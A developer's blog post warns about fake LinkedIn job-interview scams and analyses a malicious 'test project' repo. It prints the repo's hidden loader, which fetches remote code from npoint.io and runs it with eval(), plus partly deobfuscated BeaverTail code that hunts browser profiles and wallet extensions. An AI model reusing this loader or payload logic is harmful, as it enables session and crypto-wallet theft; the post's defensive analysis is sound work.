LinkedIn Interview Scams
May 13, 2025
LinkedIn’s job market is crawling with scammers peddling empty dreams, and I’m here to warn you about it. These people are relentless, and I’ve gotten a flood of these fake job pitches myself.
I’ve even had other devs reach out saying their inboxes are overflowing with the same garbage. It’s not just annoying, it’s coordinated, and it’s gotten out of hand.
How to dodge scams on LinkedIn while trying to live off ramen noodles.
I initially documented this across three posts on LinkedIn.
After the third post, I realized many people there are operating on power-saving mode, and the best they can do is write "agree?" and "Wow! Insightful" comments, while drool is dripping down their chin. So I really needed my own blog.
(Maybe the fact that it took me 3 posts to realize says more about me though.)
If you're coming here from LinkedIn, disregard everything I've said above.
You're clearly a cut above the rest, especially since you bothered to click the link.
The Foreplay: A Shady DM Promises Riches
So picture this - you've been laid off for a while, and you haven't been getting laid in a while either.
That's exactly why you’re spamming LinkedIn job applications like it’s a full-time gig.
But you're shouting into a void. Most job posts here are fake, or are crowded by 1000 other applicants.
Your inbox? Crickets. Until bam - a message slides in, oozing with promise:
I was in this exact scenario. Did I get that sweet sweet 12K gig?
Well... let's just say I wouldn't be here writing this article if I did.
The Scam Playbook: From Zoom to Doom
Here's the scam in three easy steps:
- They want you to set up a meeting with them for the interview (usually via Calend.ly) and they give you a link to an "interview test project".
- They'll get you to write some simple code, so you're in your comfort zone.
- They'll ask you to implement a call to the backend.
And that's it! You might not even notice that your sessions have been stolen, and your crypto wallet has been drained. And even if you did, it's too late anyway. The scammers are gone, with your logins & money.
After I got enough of these scam messages, I started to collect the malicious repositories. If you want to take a look at more of these, or even contribute (thank you if that's the case), you'll find the repo here.
Let's look at one such project, since all of them mostly follow the same pattern. While this project is named "Golden City", they should've really called it "Golden Shower", because that is exactly what you are getting if you run it locally.
The payload is located in /backend/controllers/userController.js.
Here's where the magic happens:

//Get Cookie
exports.getCookie = asyncErrorHandler(async (req, res, next) => {
    // pull two JSON documents from npoint.io (a free JSON hosting service)
    const rs_L = await axios.get("https://api.npoint.io/e8e29958efde154f3d7d");
    const rs_C = await axios.get("https://api.npoint.io/632ab82bbc8d7f4c2d44");
    // and execute whatever sits in their "cookie" field, inside this Node process
    eval(rs_L.data.cookie);
    eval(rs_C.data.cookie);
})();
Cracking the Malware: North Korean Glowies be mad
We're gonna decode the first payload, as I'm sure we're gonna find plenty of goodies in there. We might do the second one later, if we get bored.
By accessing the first URL you get something like this:

{
    "cookie": "(function(_0x297f50,_0x1ff217){const _0x11266b=_0x297f50();
        function _0xb5d49b(_0x3b2ff8,_0x2ad497,_0x3e81bd,_0x416d92){
            return _0x1c0e(_0x3e81bd-0x168,_0x416d92);
        }
        // truncated
}
This is unreadable. I've tried deobfuscating it with online tools, but I kept getting errors. Earlier payloads could be untangled, but the newer ones, not so much.
I found out it's because they implement infinite loops so regular deobfuscators get stuck.
It was time to write my own, using PHP. These are the steps we must take:
Fetch
- Pull in the raw JS payload via file_get_contents() and json_decode(). Bail out if there's no cookie field.
Extract the String Table
- Obfuscated code often hides all its text in a single array, e.g. function _0x1234() { const _0xABCD = ['foo','bar','baz']; }
Build a Quick-Lookup Array
- In PHP we turn those strings into a normal array: $table = ['foo','bar','baz'];
Find the Tiny "Wrapper" Functions
- The code adds little helper functions, e.g. function _0xdead(a,b,c,d) { return _0x1234(c - 0x10, d); }
- We detect each wrapper's name, which argument (c or d) holds the index, and its hex offset (e.g. 0x10).
Inline All Those Calls
- Whenever you see _0xdead(0x20,0x30,0x40,0x50), we:
  - Convert 0x40 → decimal 64
  - Subtract the wrapper's offset (64 - 16 = 48)
  - Replace the call with the actual string ("baz" if $table[48] === 'baz')
  - Use a placeholder like "<undef_X>" if the index is out of range
Stop Infinite Loops
- Some obfuscated scripts (including this one) do while(!![]) { … } (i.e. while(true)) to make deobfuscators hang, but they're no match for my l33t PHP script kiddie skills. We rewrite each loop to count iterations and break after 1000 so it won't hang.
Save the Result
- Write the deobfuscated code out to a new .js file.
Fun fact: immediately after deobfuscating this payload, Windows Defender started screaming at me with the rage of a thousand hungry hyenas.
From what I've read about "BeaverTail", it's of North Korean origin.
This matches what some security researchers and professionals that I've been talking with were saying.
More specifically, that these attacks are coming from North Korea and Russia. (It does have a "state sponsored" smell to it).
At this point you might be wondering how I didn't fall for it.
Well, *gulps* *adjusts trenchcoat*, I use Arch Linux.
Kidding ... I had you there for a sec. That malware is cross-platform; not even the most neckbearded GNU/Linux guru of them all can safely run it on bare metal.
Truth is, all those years I spent as a kid downloading sketchy songs & games off ODC/DC++ (Romanian Limewire), and giving my computer the nastiest e-STDs are finally paying off, over a decade later.
I now have a particular set of skills that allow me to spot sketchy software at a glance. (Or maybe I'm just paranoid to a concerning degree)
I know you want to see what I've been deobfuscating here, so here's the cool part:
hostname=os['hostname'](),platform=os["<undef_367>"](),
homeDir=os["<undef_224>"](),tmpDir=os["<undef_375>"](),
fs_promises=require("<undef_2d0>"+'s'),hostURL="pplication"+"<undef_1fb>"+'48:1224',
getAbsolutePath=veg193=>veg193["<undef_2b3>"](/^~([a-z]+|\/)/,(veg194,veg195)=>'/'===veg195?
homeDir:path["<undef_266>"](homeDir)+'/'+veg195),htype='99',gtype='73';
function testPath(veg196) {
try{
return fs['accessSync'](veg196),!![];
}catch(veg197){
return![];
}
}
const R=[
"<undef_1ad>"+"<undef_330>"+'Brave-Brow'+"<undef_2d3>",
'BraveSoftware/Brave-'+"<undef_20e>","<undef_33c>"+'are/Brave-'+"<undef_223>"
],
Q=[
"<undef_1b4>"+'le/Chrome',"<undef_30b>"+"<undef_217>","<undef_38c>"+"<undef_217>"
],
X=[
'Roaming/Op'+"<undef_2f4>"+"<undef_316>"+'table',"<undef_1d1>"+'oftware.Op'+"<undef_312>",'opera'
],
Bt=[
'nkbihfbeog'+"<undef_287>"+"<undef_32a>"+'nn','ejbalbakop'+"<undef_1d8>"+"<undef_284>"+'hm',"<undef_2f7>"+
"<undef_1d2>"+'ngcnapndodjp','ibnejdfjmm'+"<undef_1e1>"+"<undef_267>"+'ec',"<undef_2b1>"+"<undef_1fe>"+"<undef_2a0>"+
'pa',"<undef_2e9>"+"<undef_1e9>"+'oohckonoeemg',"<undef_1b4>"+"<undef_222>"+"<undef_2bb>"+'lj',"<undef_2b0>"+
"<undef_249>"+"<undef_285>"+'pi',"<undef_260>"+"<undef_2eb>"+"<undef_2f2>"+'ch',"<undef_2ca>"+"<undef_288>"+
"<undef_1c7>"+'bb',"<undef_215>"+"<undef_1cf>"+'emcciiolgcge',"<undef_293>"+"<undef_205>"+"<undef_202>"+
'hb',"<undef_254>"+"<undef_216>"+"<undef_252>"+'kk',"<undef_2a3>"+"<undef_1be>"+"<undef_2c9>"+'no',"<undef_203>"+
"<undef_307>"+'ggakijnkhfnd',"<undef_320>"+"<undef_37b>"+'dgccekpkcbin',"<undef_226>"+"<undef_256>"+"<undef_1fd>"+
'fa',"<undef_214>"+'cgndfolcbkdeeknbbbnhcc',"tnWSb"+'bapadjdnnojkbgioiodbic','aeachknmefphepccionb'+"<undef_264>"+
'mg',"<undef_2dd>"+"<undef_2db>"+"<undef_25f>"+'eg',"<undef_2a5>"+'adlkmhmclhkeeodmamcflc'
],
At some point I tried replacing variable names with vegetables and function names with Greek gods, but there were too many of them, so I just had chatgpt update my sloppy code and vomit out veg<number> for variables and God<number> for functions. Classic.
While we could not decode everything, we can definitely make out a couple of things:
- It collects the hostname, platform, home directory and temp directory, and testPath() wraps fs.accessSync to check which of the paths below actually exist on the machine.
- The R, Q and X arrays are fragments of Brave, Chrome and Opera profile directory names, so it's hunting for browser profiles (where cookies and saved logins live).
- The Bt array holds strings of the shape Chrome uses for extension IDs (32 lowercase letters, a to p). The visible start and end of the first one, nkbihfbeog…nn, match the ID of the MetaMask wallet extension, which lines up with the drained-wallet outcome.
- hostURL ends in :1224, which is consistent with the C2 port public reports describe for BeaverTail.
The <undef_X> placeholders are lookups the PHP script could not resolve. Two things in the raw payload most likely explain that: the wrapper's -0x168 is applied on top of a base offset inside the decoder _0x1c0e itself, and the self-invoking function at the very top of the payload rotates the string array before any lookup happens, so subtracting only the wrapper offset lands on the wrong slot for most entries.
If I had to guess, I'd say they're trying to hijack your sessions, in this specific case. Either way, something unholy is going on here.
Since every repo is slightly different, you might encounter other surprises if you run it. So don't think about running it, even if it's tempting "to see what happens". (You silly goose)
Later edit:
I was able to find an earlier version of the payload that I was able to deobfuscate a while back.
This is slightly more readable:
If you haven't caught on by now: that payload runs through eval() inside a Node.js process, so it gets everything that process has, your files, environment variables, network access, the lot.
I did not get to the interview stage since I caught this payload early,
and had some nice words to share with the scammer, and they blocked me.
The North Korean Connection: Lazarus Group
These LinkedIn scams aren't isolated incidents, they're part of a larger pattern of North Korean cyber operations. I have only recently found this Github repository which documents hundreds of incidents attributed to North Korean threat actors like Lazarus, Bluenoroff, and APT38.
This collection tracks:
- Cryptocurrency heists totaling billions in stolen funds
- Evolution of their tactics from banking heists to crypto targeting
- Detailed timelines of attacks dating back to 2016
- Various malware strains and TTPs (Tactics, Techniques, and Procedures)
It's insane that these rabid dogs have started targeting developers who are looking for jobs.
Impersonating recruiters and using fake job interviews as attack vectors was definitely not on my bingo sheet.
So, not only is your wallet empty and you're desperate, but now you also gotta dodge these cartoonishly evil fuckers with state-sponsored malware. The 2025 job market is definitely something else.
Key Takeaways
- The job market is absolutely cooked
- That npoint thingy should be DNS restricted, as a lot of these scam payloads are downloaded from there.
- Think ten times before you run some random repository on your machine. Maybe we need CSS on the backend to prevent these situations.
- Node should sandbox your code by default. No filesystem access unless you set a flag. (Node 20+ does have an opt-in permission model, --experimental-permission plus --allow-fs-read/--allow-fs-write, but it is off by default, and whatever eval() runs still gets every permission the process has.)
Links
- Lazarus Group Research
- Malicious Repos GitHub Repo
- Golden City Project
- LinkedIn Post #1
- LinkedIn Post #2
- LinkedIn Post #3
More Messages
I'm including more scam DMs and job pitch screenshots here so you know exactly what to avoid.
Learn to recognize the patterns, spot the red flags, and not get caught with your pants down.
Some of these accounts are obviously fake, but others are previously legit accounts that have been hacked and commandeered by the scammers.
Masterful Exit
I'm going back to my goon cave now. I've been yapping here for far too long.
I'll leave you with ... the only album I've released so far.
And I'm not even kidding! I deserve that self-promotion for all the hard work I put in, don't even try me.
Stay paranoid, folks, always be on your toes. The glowies are out to get you.